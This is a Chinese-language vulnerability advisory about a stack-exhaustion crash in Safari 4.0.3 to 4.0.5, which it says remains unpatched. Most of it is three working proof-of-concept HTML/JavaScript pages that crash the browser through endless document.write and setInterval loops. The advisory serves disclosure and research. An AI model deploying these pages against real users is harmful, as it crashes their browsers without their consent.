受影响系统:
Apple Safari 4.0.5
Apple Safari 4.0.4
Apple Safari 4.0.3
描述:
Safari是苹果家族机器操作系统中默认捆绑的WEB浏览器。
用户受骗使用Safari浏览器访问了恶意网页就可能耗尽所有可用栈资源,导致浏览器崩溃。
<*来源:Mathias Karlsson
链接:http://h.ackack.net/?p=258
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<script>
a="<script>var b=\"<iframe src=’javascript:window.location=\"boom\"’></iframe>\";while(1){b=b+b;document.write(b);}</scr"+"ipt>";
while(1){
a=a+a;
document.write(a);
}
</script>
<html>
<script>
loop1();
var a = "<blink>";
function loop1()
{
document.write(a);
setInterval(loop2,0);
}
function loop2()
{
document.write(a);
setInterval(loop1,0);
}
</script>
</html>
<html>
<script>
loop();
function loop()
{
setInterval(doit,0);
}
function doit()
{
var b="<marquee>";
document.write(b);
setInterval(loop,0);
}
</script>
</html>
建议:
厂商补丁:
Apple
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。